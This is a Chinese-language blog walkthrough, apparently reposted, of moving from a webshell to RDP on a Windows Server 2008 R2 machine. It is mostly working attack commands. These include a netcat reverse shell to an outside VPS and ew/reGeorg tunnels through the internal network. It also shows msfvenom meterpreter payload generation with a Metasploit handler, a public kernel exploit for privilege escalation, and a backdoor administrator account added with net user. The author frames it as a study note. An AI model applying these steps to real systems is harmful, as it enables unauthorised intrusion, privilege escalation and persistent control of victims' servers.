从webshell到3389

栏目: 服务器 · 发布时间: 5年前

内容简介:之前玩过一下linux下的提权,前段时间在上课的时候看了亮神的文章,感觉渗透还是不应该只停留在web层面。虽然说连WEB层面的东西都还没搞懂,但是还是想拓宽一下自己的攻击思路。当拿到了一个webshell之后,还能干什么呢?之前挖SRC,运气好也撞到过一个RCE,但是这些都只能停留在拿了shell之后,就不能再测下去了,后渗透这块,完全不清楚,虽然这次还是没有接触到域渗透,但是学了一些内网与代理之类的知识,还是做个小结为好。首先拿到了一台服务器的webshell,这台机的状况

之前玩过一下 linux 下的提权,前段时间在上课的时候看了亮神的文章,感觉渗透还是不应该只停留在web层面。虽然说连WEB层面的东西都还没搞懂,但是还是想拓宽一下自己的攻击思路。当拿到了一个webshell之后,还能干什么呢?之前挖SRC,运气好也撞到过一个RCE,但是这些都只能停留在拿了 shell 之后,就不能再测下去了,后渗透这块,完全不清楚,虽然这次还是没有接触到域渗透,但是学了一些内网与代理之类的知识,还是做个小结为好。

正文

一些信息

首先

拿到了一台服务器的webshell,这台机的状况

  • 只有一个内网IP
  • webshell权限 nt authority\network service(非system)可以执行命令
  • Microsoft Windows Server 2008 R2
  • systeminfo 补丁到 [246]: KB4034733(补丁最后时间大概在2016年左右)
  • 不存在域

由于在内网里面,很多操作需要用到代理。

内网端口转发:阿烨师傅的文章 https://www.jianshu.com/p/735e8f1746f0

我个人使用了

ew

我尝试了用连接 本机-vps-webshell

ps:如果需要交互可以上传一个nc和cmd 反弹cmd

vul: nc -e cmd.exe yourvps 2333
vps: nc -lvvp 2333

一般ew是会被杀,暂时没有了解免杀方面的知识

vul: ew -s rssocks -d yourvps -e 2333
vps: ./ew_for_linux64 -s rcsocks -l 1080 -e 2333

自己的电脑可以直接上个代理

地址: yourvps 2333

reGeorg与Proxifier

详细可以看 https://xz.aliyun.com/t/228

上传tunnel.aspx

访问显示

Georg says, 'All seems fine

运行

python reGeorgSocksProxy.py -p 9999 -u http://xxxxxx.com/tunnel.asp

设置代理服务器为9999

设置好代理之后就可以3389链接了

连接地址:vul的内网ip

上传meterpreter

渗透自然少不了metaspolit

在拿了webshell之后,上次一个meterpreter上去会方便很多操作,

可以参考亮神的Micro8

https://micro8.gitbook.io/micro8/contents-1/1-10/10msfvenom-chang-yong-sheng-cheng-payload-ming-ling

我在腾讯云上生成好像在运行的时候报错了,所以我直接在我的windows上生成了

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=yourvps LPORT=2334 -f exe > payload.exe

在vps上

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost yourvps
set lport 2334
exploit

获取到会话

关于meterpreter的操作可以参考先知社区的 https://xz.aliyun.com/t/2536

提权

meterpreter的某些操作需要足够的权限,以及我并没有一个可以登入3389的账户,webshell本身权限也不够,所以提权是必不可少的。

同样的亮神的第一课和第二课都是关于提权的。

windows下的提权

对外公开的exp: https://github.com/SecWiki/windows-kernel-exploits

我选择了CVE-2018-8639来提权

https://github.com/ze0r/CVE-2018-8639-exp

exp.exe

再whoami,权限变成了

nt authority\system

添加一个账户并且给他管理员

net user test password /add
net localgroup administrators test /add

reGeorg与Proxifier配合使用登入3389


以上所述就是小编给大家介绍的《从webshell到3389》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

创客

创客

克里斯·安德森 / 萧潇 / 中信出版社 / 2012-12 / 45.00元

★《长尾理论》、《免费》作者克里斯•安德森最新作品 ★ 创客运动,一场即将到来的革命 ★ 编辑推荐: 这是一场即将到来的革命。 这是一个创客的时代,他们引领科技行业走进了一个新的方向,即个体制造时代的到来。运用互联网和最新的工业技术进行创造,创客运动发出了最强音。 如果说《第三次工业革命》一书的核心是互联网与新能源融合在一起所引发的工业变革。那么《创客》一书的核心则是......一起来看看 《创客》 这本书的介绍吧!

在线进制转换器
在线进制转换器

各进制数互转换器

SHA 加密
SHA 加密

SHA 加密工具

XML 在线格式化
XML 在线格式化

在线 XML 格式化压缩工具